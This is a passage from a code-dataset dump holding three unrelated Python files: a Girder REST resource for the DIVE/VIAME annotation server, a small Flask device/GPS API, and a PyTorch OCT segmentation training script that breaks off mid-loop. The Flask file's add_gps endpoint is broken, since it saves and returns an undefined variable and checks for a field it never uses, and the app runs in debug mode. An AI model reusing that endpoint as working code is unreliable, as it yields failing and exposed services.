task_group_task.TaskGroupTaskRBACFactory,\n    \"Cycle\": cycle.CycleRBACFactory,\n    \"CycleTaskGroup\": cycle_task_group.CycleTaskGroupRBACFactory,\n    \"CycleTask\": cycle_task.CycleTaskRBACFactory,\n    \"CycleTaskEntry\": cycle_task_entry.CycleTaskEntryRBACFactory,\n    \"Universal\": universal_factory.UniversalRBACFactory\n}\n","sub_path":"test/integration/ggrc/access_control/rbac_factories/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"349125251","text":"from typing import List\n\nfrom girder.api import access\nfrom girder.api.describe import Description, autoDescribeRoute, describeRoute\nfrom girder.api.rest import Resource\nfrom girder.constants import AccessType\nfrom girder.exceptions import RestException\nfrom girder.models.folder import Folder\nfrom girder.models.item import Item\nfrom girder.models.setting import Setting\nfrom girder.models.token import Token\nfrom girder.models.user import User\nfrom girder_jobs.models.job import Job\n\nfrom dive_tasks.tasks import (\n    UPGRADE_JOB_DEFAULT_URLS,\n    convert_images,\n    convert_video,\n    train_pipeline,\n    upgrade_pipelines,\n)\nfrom dive_utils import TRUTHY_META_VALUES, fromMeta, models\nfrom dive_utils.constants import (\n    JOBCONST_PIPELINE_NAME,\n    JOBCONST_PRIVATE_QUEUE,\n    JOBCONST_RESULTS_FOLDER_ID,\n    JOBCONST_TRAINING_CONFIG,\n    JOBCONST_TRAINING_INPUT_IDS,\n    SETTINGS_CONST_JOBS_CONFIGS,\n    ConfidenceFiltersMarker,\n    DatasetMarker,\n    ForeignMediaIdMarker,\n    PublishedMarker,\n    UserPrivateQueueEnabledMarker,\n    csvRegex,\n    imageRegex,\n    jsonRegex,\n    safeImageRegex,\n    videoRegex,\n    ymlRegex,\n)\nfrom dive_utils.types import AvailableJobSchema, PipelineDescription\n\nfrom .pipelines import load_pipelines, run_pipeline\nfrom .serializers import meva as meva_serializer\nfrom .training import ensure_csv_detections_file, training_output_folder\nfrom .transforms import GetPathFromItemId\nfrom .utils import (\n    createSoftClone,\n    detections_file,\n    detections_item,\n    get_or_create_auxiliary_folder,\n    getCloneRoot,\n    process_csv,\n    process_json,\n    saveTracks,\n    valid_images,\n    verify_dataset,\n)\n\n\nclass Viame(Resource):\n    def __init__(self):\n        super(Viame, self).__init__()\n        self.resourceName = \"viame\"\n\n        self.route(\"GET\", (\"datasets\",), self.list_datasets)\n        self.route(\"POST\", (\"dataset\", \":id\", \"clone\"), self.clone_dataset)\n        self.route(\"GET\", (\"brand_data\",), self.get_brand_data)\n        
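# Pipeline execution, training, and post-processing endpoints:\n        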
self.route(\"GET\", (\"pipelines\",), self.get_pipelines)\n self.route(\"GET\", (\"training_configs\",), self.get_training_configs)\n self.route(\"POST\", (\"pipeline\",), self.run_pipeline_task)\n self.route(\"POST\", (\"train\",), self.run_training)\n self.route(\"POST\", (\"upgrade_pipelines\",), self.upgrade_pipelines)\n self.route(\"POST\", (\"update_job_configs\",), self.update_job_configs)\n self.route(\"POST\", (\"postprocess\", \":id\"), self.postprocess)\n self.route(\"PUT\", (\"metadata\", \":id\"), self.update_metadata)\n self.route(\"PUT\", (\"attributes\",), self.save_attributes)\n self.route(\"POST\", (\"validate_files\",), self.validate_files)\n self.route(\"GET\", (\"valid_images\",), self.get_valid_images)\n self.route(\"PUT\", (\"user\", \":id\", \"use_private_queue\"), self.use_private_queue)\n\n def _get_queue_name(self, default=\"celery\"):\n user = self.getCurrentUser()\n if user.get(UserPrivateQueueEnabledMarker, False):\n return f'{user[\"login\"]}@private'\n return default\n\n @access.admin\n @autoDescribeRoute(\n Description(\"Upgrade addon pipelines\")\n .param(\n \"force\",\n \"Force re-download of all addons.\",\n paramType=\"query\",\n dataType=\"boolean\",\n default=False,\n required=False,\n )\n .jsonParam(\n \"urls\",\n \"List of public URLs for addon zipfiles\",\n paramType='body',\n requireArray=True,\n required=False,\n default=UPGRADE_JOB_DEFAULT_URLS,\n )\n )\n def upgrade_pipelines(self, force: bool, urls: List[str]):\n token = Token().createToken(user=self.getCurrentUser(), days=1)\n Setting().set(SETTINGS_CONST_JOBS_CONFIGS, None)\n upgrade_pipelines.delay(\n urls=urls,\n force=force,\n girder_job_title=\"Upgrade Pipelines\",\n girder_client_token=str(token[\"_id\"]),\n )\n\n @access.admin\n @autoDescribeRoute(\n Description(\"Persist discovered job configurations\").jsonParam(\n \"configs\",\n \"Replace static job configurations\",\n required=True,\n requireObject=True,\n paramType='body',\n )\n )\n def update_job_configs(self, configs: AvailableJobSchema):\n Setting().set(SETTINGS_CONST_JOBS_CONFIGS, configs)\n\n @access.public\n @autoDescribeRoute(Description(\"Get custom brand data\"))\n def get_brand_data(self):\n adminUserIds = [user['_id'] for user in User().getAdmins()]\n # Find an item owned by an admin with meta.brand=True\n data = Item().findOne(\n {\n 'meta.brand': {'$in': TRUTHY_META_VALUES},\n 'creatorId': {'$in': adminUserIds},\n }\n )\n if data is not None:\n return data['meta']\n return {}\n\n @access.user\n @describeRoute(\n Description(\"List datasets in the system\")\n .pagingParams(\"created\")\n .param(\n PublishedMarker,\n 'Return only published datasets',\n required=False,\n default=False,\n dataType='boolean',\n )\n )\n def list_datasets(self, params):\n limit, offset, sort = self.getPagingParameters(params)\n query = {\n f'meta.{DatasetMarker}': {'$in': TRUTHY_META_VALUES},\n }\n if self.boolParam(PublishedMarker, params):\n query = {\n '$and': [\n query,\n {f'meta.{PublishedMarker}': {'$in': TRUTHY_META_VALUES}},\n ]\n }\n return Folder().findWithPermissions(\n query, offset=offset, limit=limit, sort=sort, user=self.getCurrentUser()\n )\n\n @access.user\n @autoDescribeRoute(\n Description(\"Clone a dataset\")\n .modelParam(\n \"id\",\n description=\"Dataset clone source\",\n model=Folder,\n level=AccessType.READ,\n )\n .modelParam(\n \"parentFolderId\",\n description=\"Parent folder of the clone\",\n paramType=\"formData\",\n destName=\"parentFolder\",\n model=Folder,\n level=AccessType.WRITE,\n )\n .param(\n \"name\",\n 
\"Name for new dataset\",\n paramType=\"formData\",\n dataType=\"string\",\n default=None,\n required=False,\n )\n )\n def clone_dataset(self, folder, parentFolder, name):\n verify_dataset(folder)\n owner = self.getCurrentUser()\n return createSoftClone(owner, folder, parentFolder, name)\n\n @access.user\n @describeRoute(Description(\"Get available pipeline configurations\"))\n def get_pipelines(self, params):\n return load_pipelines(self.getCurrentUser())\n\n @access.user\n @autoDescribeRoute(Description(\"Get available training configs\"))\n def get_training_configs(self, params):\n static_job_configs: AvailableJobSchema = (\n Setting().get(SETTINGS_CONST_JOBS_CONFIGS) or {}\n )\n return static_job_configs.get('training', {})\n\n @access.user\n @autoDescribeRoute(\n Description(\"Run viame pipeline\")\n .modelParam(\n \"folderId\",\n description=\"Folder id of a video clip\",\n model=Folder,\n paramType=\"query\",\n required=True,\n level=AccessType.WRITE,\n )\n .jsonParam(\"pipeline\", \"The pipeline to run on the dataset\", required=True)\n )\n def run_pipeline_task(self, folder, pipeline: PipelineDescription):\n user = self.getCurrentUser()\n return run_pipeline(user, folder, pipeline, self._get_queue_name(\"pipelines\"))\n\n @access.user\n @autoDescribeRoute(\n Description(\"Run training on a folder\")\n .jsonParam(\n \"folderIds\",\n description=\"Array of folderIds to run training on\",\n paramType=\"body\",\n )\n .param(\n \"pipelineName\",\n description=\"The name of the resulting pipeline\",\n paramType=\"query\",\n required=True,\n )\n .param(\n \"config\",\n description=\"The configuration to use for training\",\n paramType=\"query\",\n required=True,\n )\n )\n def run_training(self, folderIds, pipelineName, config):\n user = self.getCurrentUser()\n token = Token().createToken(user=user, days=14)\n\n detection_list = []\n folder_list = []\n folder_names = []\n if folderIds is None or len(folderIds) == 0:\n raise RestException(\"No folderIds in param\")\n\n for folderId in folderIds:\n folder = Folder().load(folderId, level=AccessType.READ, user=user)\n if folder is None:\n raise RestException(f\"Cannot access folder {folderId}\")\n getCloneRoot(user, folder)\n folder_names.append(folder['name'])\n # Ensure detection has a csv format\n # TODO: Move this into worker job\n train_on_detections_item = detections_item(folder, strict=True)\n ensure_csv_detections_file(folder, train_on_detections_item, user)\n detection_list.append(train_on_detections_item)\n folder_list.append(folder)\n\n # Ensure the folder to upload results to exists\n results_folder = training_output_folder(user)\n job_is_private = user.get(UserPrivateQueueEnabledMarker, False)\n newjob = train_pipeline.apply_async(\n queue=self._get_queue_name(\"training\"),\n kwargs=dict(\n results_folder=results_folder,\n source_folder_list=folder_list,\n groundtruth_list=detection_list,\n pipeline_name=pipelineName,\n config=config,\n girder_client_token=str(token[\"_id\"]),\n girder_job_title=(f\"Running training on {len(folder_list)} datasets\"),\n girder_job_type=\"private\" if job_is_private else \"training\",\n ),\n )\n newjob.job[JOBCONST_PRIVATE_QUEUE] = job_is_private\n newjob.job[JOBCONST_TRAINING_INPUT_IDS] = folderIds\n newjob.job[JOBCONST_RESULTS_FOLDER_ID] = str(results_folder['_id'])\n newjob.job[JOBCONST_TRAINING_CONFIG] = config\n newjob.job[JOBCONST_PIPELINE_NAME] = pipelineName\n Job().save(newjob.job)\n return newjob.job\n\n @access.user\n @autoDescribeRoute(\n Description(\"Test whether or not a set of 
files are safe to upload\").jsonParam(\n \"files\", \"\", paramType=\"body\"\n )\n )\n def validate_files(self, files):\n ok = True\n message = \"\"\n mediatype = \"\"\n videos = [f for f in files if videoRegex.search(f)]\n csvs = [f for f in files if csvRegex.search(f)]\n images = [f for f in files if imageRegex.search(f)]\n ymls = [f for f in files if ymlRegex.search(f)]\n jsons = [f for f in files if jsonRegex.search(f)]\n if len(videos) and len(images):\n ok = False\n message = \"Do not upload images and videos in the same batch.\"\n elif len(csvs) > 1:\n ok = False\n message = \"Can only upload a single CSV Annotation per import\"\n elif len(jsons) > 1:\n ok = False\n message = \"Can only upload a single JSON Annotation per import\"\n elif len(csvs) == 1 and len(ymls):\n ok = False\n message = \"Cannot mix annotation import types\"\n elif len(videos) > 1 and (len(csvs) or len(ymls) or len(jsons)):\n ok = False\n message = (\n \"Annotation upload is not supported when multiple videos are uploaded\"\n )\n elif (not len(videos)) and (not len(images)):\n ok = False\n message = \"No supported media-type files found\"\n elif len(videos):\n mediatype = 'video'\n elif len(images):\n mediatype = 'image-sequence'\n\n return {\n \"ok\": ok,\n \"message\": message,\n \"type\": mediatype,\n \"media\": images + videos,\n \"annotations\": csvs + ymls + jsons,\n }\n\n @access.user\n @autoDescribeRoute(\n Description(\"Post-processing to be run after media/annotation import\")\n .modelParam(\n \"id\",\n description=\"Folder containing the items to process\",\n model=Folder,\n level=AccessType.WRITE,\n )\n .param(\n \"skipJobs\",\n \"Whether to skip processing that might dispatch worker jobs\",\n paramType=\"formData\",\n dataType=\"boolean\",\n default=False,\n required=False,\n )\n )\n def postprocess(self, folder, skipJobs):\n \"\"\"\n Post-processing to be run after media/annotation import\n\n\n When skipJobs=False, the following may run as jobs:\n Transcoding of Video\n Transcoding of Images\n Conversion of KPF annotations into track JSON\n\n In either case, the following may run synchronously:\n Conversion of CSV annotations into track JSON\n \"\"\"\n user = self.getCurrentUser()\n job_is_private = user.get(UserPrivateQueueEnabledMarker, False)\n auxiliary = get_or_create_auxiliary_folder(folder, user)\n isClone = fromMeta(folder, ForeignMediaIdMarker, None) is not None\n # add default confidence filter threshold to folder metadata\n folder['meta'][ConfidenceFiltersMarker] = {'default': 0.1}\n\n if not skipJobs and not isClone:\n token = Token().createToken(user=user, days=2)\n # transcode VIDEO if necessary\n videoItems = Folder().childItems(\n folder, filters={\"lowerName\": {\"$regex\": videoRegex}}\n )\n\n for item in videoItems:\n newjob = convert_video.apply_async(\n queue=self._get_queue_name(),\n kwargs=dict(\n path=GetPathFromItemId(str(item[\"_id\"])),\n folderId=str(item[\"folderId\"]),\n auxiliaryFolderId=auxiliary[\"_id\"],\n itemId=str(item[\"_id\"]),\n girder_job_title=f\"Converting {item['_id']} to a web friendly format\",\n girder_client_token=str(token[\"_id\"]),\n girder_job_type=\"private\" if job_is_private else \"convert\",\n ),\n )\n newjob.job[JOBCONST_PRIVATE_QUEUE] = job_is_private\n Job().save(newjob.job)\n\n # transcode IMAGERY if necessary\n imageItems = Folder().childItems(\n folder, filters={\"lowerName\": {\"$regex\": imageRegex}}\n )\n safeImageItems = Folder().childItems(\n folder, filters={\"lowerName\": {\"$regex\": safeImageRegex}}\n )\n\n if 
imageItems.count() > safeImageItems.count():\n newjob = convert_images.apply_async(\n queue=self._get_queue_name(),\n kwargs=dict(\n folderId=folder[\"_id\"],\n girder_client_token=str(token[\"_id\"]),\n girder_job_title=f\"Converting {folder['_id']} to a web friendly format\",\n girder_job_type=\"private\" if job_is_private else \"convert\",\n ),\n )\n newjob.job[JOBCONST_PRIVATE_QUEUE] = job_is_private\n Job().save(newjob.job)\n\n elif imageItems.count() > 0:\n folder[\"meta\"][DatasetMarker] = True\n\n # transform KPF if necessary\n ymlItems = Folder().childItems(\n folder, filters={\"lowerName\": {\"$regex\": ymlRegex}}\n )\n if ymlItems.count() > 0:\n # There might be up to 3 yamls\n allFiles = [Item().childFiles(item)[0] for item in ymlItems]\n saveTracks(folder, meva_serializer.load_kpf_as_tracks(allFiles), user)\n ymlItems.rewind()\n for item in ymlItems:\n Item().move(item, auxiliary)\n\n Folder().save(folder)\n\n process_csv(folder, user)\n process_json(folder, user)\n\n # If no detections file exists create one\n if detections_file(folder) is None:\n saveTracks(folder, {}, user)\n\n return folder\n\n @access.user\n @autoDescribeRoute(\n Description(\"Save mutable metadata for a dataset\")\n .modelParam(\n \"id\",\n description=\"datasetId or folder for the metadata\",\n model=Folder,\n level=AccessType.WRITE,\n )\n .jsonParam(\n \"data\",\n \"JSON with the metadata to set\",\n requireObject=True,\n paramType=\"body\",\n )\n .errorResponse('Using a reserved metadata key', 400)\n )\n def update_metadata(self, folder, data):\n verify_dataset(folder)\n validated = models.MetadataMutableUpdate(**data)\n for name, value in validated.dict(exclude_none=True).items():\n folder['meta'][name] = value\n Folder().save(folder)\n return folder['meta']\n\n @access.user\n @autoDescribeRoute(\n Description(\"\")\n .modelParam(\n \"folderId\",\n description=\"folder id of a clip\",\n model=Folder,\n paramType=\"query\",\n required=True,\n level=AccessType.WRITE,\n )\n .jsonParam(\n \"attributes\",\n \"upsert and delete attributes\",\n paramType=\"body\",\n requireObject=True,\n )\n )\n def save_attributes(self, folder, attributes):\n verify_dataset(folder)\n upsert = attributes.get('upsert', [])\n delete = attributes.get('delete', [])\n attributes_dict = fromMeta(folder, 'attributes', {})\n for attribute_id in delete:\n attributes_dict.pop(str(attribute_id), None)\n for attribute in upsert:\n validated: models.Attribute = models.Attribute(**attribute)\n attributes_dict[str(validated.key)] = validated.dict(exclude_none=True)\n\n upserted_len = len(upsert)\n deleted_len = len(delete)\n\n if upserted_len or deleted_len:\n folder['meta']['attributes'] = attributes_dict\n Folder().save(folder)\n\n return {\n \"updated\": upserted_len,\n \"deleted\": deleted_len,\n }\n\n @access.user\n @autoDescribeRoute(\n Description(\"\").modelParam(\n \"folderId\",\n description=\"folder id of a clip\",\n model=Folder,\n paramType=\"query\",\n required=True,\n level=AccessType.READ,\n )\n )\n def get_valid_images(self, folder):\n return valid_images(folder, self.getCurrentUser())\n\n @access.user\n @autoDescribeRoute(\n Description('Set user use private queue')\n .modelParam(\"id\", description='user id', model=User, level=AccessType.ADMIN)\n .param(\n \"privateQueueEnabled\",\n description=\"Set private queue enabled\",\n paramType='query',\n dataType='boolean',\n default=None,\n )\n )\n def use_private_queue(self, user: dict, privateQueueEnabled: bool):\n if privateQueueEnabled is not None:\n 
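# Persist the updated queue preference on the user document.\n            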
user[UserPrivateQueueEnabledMarker] = privateQueueEnabled\n            User().save(user)\n        return {\n            UserPrivateQueueEnabledMarker: user.get(\n                UserPrivateQueueEnabledMarker, False\n            ),\n        }\n","sub_path":"server/dive_server/viame.py","file_name":"viame.py","file_ext":"py","file_size_in_byte":19741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"422792443","text":"#!flask/bin/python\nimport six\nfrom flask import Flask, jsonify, abort, request, make_response, url_for\nfrom app.models import Device, GPS, DeviceSchema, GPSSchema\nimport os\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport datetime\n\napp = Flask(__name__)\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'crus.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\ngps_schema = GPSSchema()\ngpss_schema = GPSSchema(many=True)\ndevice_schema = DeviceSchema()\ndevices_schema = DeviceSchema(many=True)\n\n@app.shell_context_processor\ndef make_shell_context():\n    return {'db': db, 'Device': Device, 'GPS': GPS}\n\n@app.errorhandler(400)\ndef bad_request(error):\n\treturn make_response(jsonify({'error': 'Bad request'}), 400)\n\t\n@app.errorhandler(404)\ndef not_found(error):\n\treturn make_response(jsonify({'error': 'Not found'}), 404)\n\t\t\n@app.route('/p1/device', methods=['GET'])\ndef get_devices():\n\tall_devices = Device.query.all()\n\tresult = devices_schema.dump(all_devices)\n\treturn jsonify(result.data)\n\t\n@app.route('/p1/device/<int:device_id>', methods=['GET'])\ndef get_device(device_id):\n\tif device_id == 0:\n\t\tabort(404)\n\tdevice = Device.query.get(device_id)\n\treturn device_schema.jsonify(device)\n\t\n@app.route('/p1/device', methods=['POST'])\ndef add_device():\n\tif not request.json or 'name' not in request.json:\n\t\tabort(400)\n\t\t\n\tname = request.json['name']\n\tsimid = request.json['simid']\n\tregisterutc = request.json['registerutc']\n\t\n\tnew_device = Device(name, simid, registerutc)\n\t\n\tdb.session.add(new_device)\n\tdb.session.commit()\n\t\n\treturn jsonify(new_device)\n\n@app.route('/p1/device/<int:device_id>', methods=['PUT'])\ndef update_device(device_id):\n\tif device_id == 0:\n\t\tabort(404)\n\tif not request.json:\n\t\tabort(400)\n\tif 'name' in request.json and not isinstance(request.json['name'], six.string_types):\n\t\tabort(400)\n\tif 'simid' in request.json and not isinstance(request.json['simid'], six.string_types):\n\t\tabort(400)\n\tif 'registerutc' in request.json and not isinstance(request.json['registerutc'], datetime.datetime):\n\t\tabort(400)\n\tdevice = Device.query.get(device_id)\n\tname = request.json['name']\n\tsimid = request.json['simid']\n\tregisterutc = request.json['registerutc']\n\t\n\tdevice.name = name\n\tdevice.simid = simid\n\tdevice.registerutc = registerutc\n\t\n\tdb.session.commit()\n\treturn device_schema.jsonify(device)\n\t\n@app.route('/p1/device/gps', methods=['GET'])\ndef get_gps_device():\n\tall_gps = GPS.query.all()\n\tresult = gpss_schema.dump(all_gps)\n\treturn jsonify(result.data)\n\t\n@app.route('/p1/gps/<int:gps_id>', methods=['GET'])\ndef get_gps(gps_id):\n\tif gps_id == 0:\n\t\tabort(404)\n\tgps = GPS.query.get(gps_id)\n\treturn gps_schema.jsonify(gps)\n\t\n@app.route('/p1/gps', methods=['POST'])\ndef add_gps():\n\tif not request.json or 'name' not in request.json:\n\t\tabort(400)\n\t\n\tdevice_id = request.json['device_id']\n\tutc = request.json['utc']\n\tlatitude = 
request.json['latitude']\n\tlatDir = request.json['latDir']\n\tlongitude = request.json['longitude']\n\tlongDir = request.json['longDir']\n\thdop = request.json['hdop']\n\taltitude = request.json['altitude']\n\tfix = request.json['fix']\n\tcog = request.json['cog']\n\tspkm = request.json['spkm']\n\tspkn = request.json['spkn']\n\tdate = request.json['date']\n\tnsat = request.json['nsat']\n\t\n\tnew_gps = GPS(device_id, utc, latitude, latDir, \\\n\t\tlongitude, longDir, hdop, altitude, fix, cog, \\\n\t\tspkm, spkn, date, nsat)\n\t\n\tdb.session.add(new_device)\n\tdb.session.commit()\n\t\n\treturn jsonify(new_device)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"429667648","text":"import os\nimport errno\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport time\nimport timeit\nfrom torch.utils import data\nimport torch.nn.functional as F\n\nfrom torch.optim import lr_scheduler\nfrom NNLoss import dice_loss\nfrom NNMetrics import segmentation_scores, f1_score\nfrom NNMetrics import intersectionAndUnion\nfrom NNUtils import evaluate, test\nfrom tensorboardX import SummaryWriter\nfrom torch.autograd import grad\n# ================================================\nfrom NNBaselines import SegNet, AttentionUNet\n\nfrom Unet import UNet\n\nfrom SOASNet_basic import SOASNet\nfrom SOASNet_large_scale import SOASNet_ls\nfrom SOASNet_multi_attention import SOASNet_ma\nfrom SOASNet_very_large_scale import SOASNet_vls\nfrom SOASNet_segnet_back import SOASNet_segnet\nfrom SOASNet_segnet_relay_net import SOASNet_segnet_skip\nfrom SOASNet_single_scale import SOASNet_ss\n\nfrom adamW import AdamW\n# =============================\nfrom NNUtils import getData_OCT\n# =============================\n\n\ndef trainModels(repeat,\n data_set,\n input_dim,\n train_batch,\n model,\n epochs,\n width,\n l_r,\n l_r_s,\n shuffle,\n loss,\n norm,\n log,\n class_no,\n depth,\n depth_limit,\n data_augmentation_train,\n data_augmentation_test,\n cluster=False):\n\n if cluster is False:\n\n if data_set == 'duke':\n\n data_directory = '/home/moucheng/projects_data/OCT/duke_dataset/'\n\n else:\n\n data_directory = '/home/moucheng/projects_data/OCT/our_data/'\n\n else:\n\n if data_set == 'duke':\n\n data_directory = '/cluster/project0/CityScapes/projects_data/OCT/duke/'\n\n else:\n\n data_directory = '/cluster/project0/CityScapes/projects_data/OCT/'\n\n # trainloader, train_dataset, validate_dataset, test_dataset_1, test_dataset_2 = getData_OCT(data_directory, train_batch, shuffle_mode=shuffle, augmentation=data_augmentation)\n #\n if cluster is False and data_set == 'duke':\n #\n for j in range(1, 6, 1):\n #\n data_directory = '/home/moucheng/projects_data/OCT/duke_dataset/' + str(j) + '/'\n #\n trainloader, train_dataset, validate_dataset, test_dataset_1, test_dataset_2 = getData_OCT(data_directory, train_batch, shuffle_mode=shuffle, augmentation_train=data_augmentation_train, augmentation_test=data_augmentation_test)\n #\n trained_model = trainSingleModel(model_name=model,\n epochs=epochs,\n width=width,\n lr=l_r,\n repeat=str(j),\n lr_scedule=l_r_s,\n train_dataset=train_dataset,\n train_batch=train_batch,\n train_loader=trainloader,\n data_name=data_set,\n validate_data=validate_dataset,\n test_data_1=test_dataset_1,\n test_data_2=test_dataset_2,\n data_augmentation_train=data_augmentation_train,\n 
data_augmentation_test=data_augmentation_test,\n shuffle=shuffle,\n loss=loss,\n norm=norm,\n log=log,\n no_class=class_no,\n input_channel=input_dim,\n depth=depth,\n depth_limit=depth_limit)\n\n elif cluster is True and data_set == 'duke':\n #\n for j in range(1, 6, 1):\n #\n data_directory = '/cluster/project0/CityScapes/projects_data/OCT/duke/' + str(j) + '/'\n #\n trainloader, train_dataset, validate_dataset, test_dataset_1, test_dataset_2 = getData_OCT(data_directory, train_batch, shuffle_mode=shuffle, augmentation_train=data_augmentation_train, augmentation_test=data_augmentation_test)\n #\n trained_model = trainSingleModel(model_name=model,\n epochs=epochs,\n width=width,\n lr=l_r,\n repeat=str(j),\n lr_scedule=l_r_s,\n train_dataset=train_dataset,\n train_batch=train_batch,\n train_loader=trainloader,\n data_name=data_set,\n validate_data=validate_dataset,\n test_data_1=test_dataset_1,\n test_data_2=test_dataset_2,\n data_augmentation_train=data_augmentation_train,\n data_augmentation_test=data_augmentation_test,\n shuffle=shuffle,\n loss=loss,\n norm=norm,\n log=log,\n no_class=class_no,\n input_channel=input_dim,\n depth=depth,\n depth_limit=depth_limit)\n\n else:\n #\n trainloader, train_dataset, validate_dataset, test_dataset_1, test_dataset_2 = getData_OCT(data_directory, train_batch, shuffle_mode=shuffle, augmentation_train=data_augmentation_train, augmentation_test=data_augmentation_test)\n #\n for j in range(1, repeat+1, 1):\n #\n trained_model = trainSingleModel(model_name=model,\n epochs=epochs,\n width=width,\n lr=l_r,\n repeat=str(j),\n lr_scedule=l_r_s,\n train_dataset=train_dataset,\n train_batch=train_batch,\n train_loader=trainloader,\n data_name=data_set,\n validate_data=validate_dataset,\n test_data_1=test_dataset_1,\n test_data_2=test_dataset_2,\n data_augmentation_train=data_augmentation_train,\n data_augmentation_test=data_augmentation_test,\n shuffle=shuffle,\n loss=loss,\n norm=norm,\n log=log,\n no_class=class_no,\n input_channel=input_dim,\n depth=depth,\n depth_limit=depth_limit)\n\n\ndef trainSingleModel(model_name,\n depth_limit,\n epochs,\n width,\n depth,\n repeat,\n lr,\n lr_scedule,\n train_dataset,\n train_batch,\n data_name,\n data_augmentation_train,\n data_augmentation_test,\n train_loader,\n validate_data,\n test_data_1,\n test_data_2,\n shuffle,\n loss,\n norm,\n log,\n no_class,\n input_channel):\n # :param model: network module\n # :param epochs: training total epochs\n # :param width: first encoder channel number\n # :param lr: learning rate\n # :param lr_scedule: true or false for learning rate schedule\n # :param repeat: repeat same experiments\n # :param train_dataset: training data set\n # :param train_batch: batch size\n # :param train_loader: training loader\n # :param validate_loader: validation loader\n # :param shuffle: shuffle training data or not\n # :param loss: loss function tag, use 'ce' for cross-entropy\n # :param weights_transfer: 'dynamic', 'static' or 'average'\n # :param alpha: weight for knowledge distillation loss\n # :param norm_1: normalisation for model 1\n # :param norm_2: normalisation for model 2\n # :param log: log tag for recording experiments\n # :param no_class: 2 or multi-class\n # :param input_channel: 4 for BRATS, 3 for CityScapes\n # :param dataset_name: name of the dataset\n # :param temperature_start: 2 or 4\n # :param temperature_end: 4 or 2\n # :return:\n device = torch.device('cuda:0')\n\n # side_output_use = False\n\n if model_name == 'unet':\n\n model = UNet(n_channels=input_channel, 
n_classes=no_class, bilinear=True).to(device=device)\n\n # model = UNet2(in_channels=1, n_classes=1, depth=4, wf=32, padding=False, batch_norm=True, up_mode='upconv').to(device=device)\n\n elif model_name == 'Segnet':\n\n model = SegNet(in_ch=input_channel, width=width, norm=norm, depth=4, n_classes=no_class, dropout=True, side_output=False).to(device=device)\n\n elif model_name == 'SOASNet_single':\n\n model = SOASNet_ss(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet':\n\n model = SOASNet(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet_large_kernel':\n\n model = SOASNet_ls(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet_multi_attn':\n\n model = SOASNet_ma(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet_very_large_kernel':\n\n model = SOASNet_vls(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet_segnet':\n\n model = SOASNet_segnet(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet_segnet_skip':\n\n model = SOASNet_segnet_skip(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'RelayNet':\n\n model = SOASNet_segnet_skip(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='relaynet', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'attn_unet':\n\n model = AttentionUNet(in_ch=input_channel, width=width, visulisation=False, class_no=no_class).to(device=device)\n\n # ==================================\n training_amount = len(train_dataset)\n iteration_amount = training_amount // train_batch\n iteration_amount = iteration_amount - 1\n\n model_name = model_name + '_Epoch_' + str(epochs) + \\\n '_Dataset_' + data_name + \\\n '_Batch_' + str(train_batch) + \\\n '_Width_' + str(width) + \\\n '_Loss_' + loss + \\\n '_Norm_' + norm + \\\n '_ShuffleTraining_' + str(shuffle) + \\\n '_Data_Augmentation_Train_' + data_augmentation_train + '_' + \\\n '_Data_Augmentation_Test_' + data_augmentation_test + '_' + \\\n '_lr_' + str(lr) + \\\n '_Repeat_' + str(repeat)\n\n print(model_name)\n\n writer = SummaryWriter('../../Log_' + log + '/' + model_name)\n\n optimizer = AdamW(model.parameters(), lr=lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=1e-5)\n\n # if lr_scedule is True:\n # learning_rate_steps = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)\n\n for epoch in range(epochs):\n\n model.train()\n\n running_loss = 0\n\n # i: index of mini batch\n if 'mixup' not in data_augmentation_train:\n\n for j, (images, labels, imagename) in enumerate(train_loader):\n\n images = images.to(device=device, 
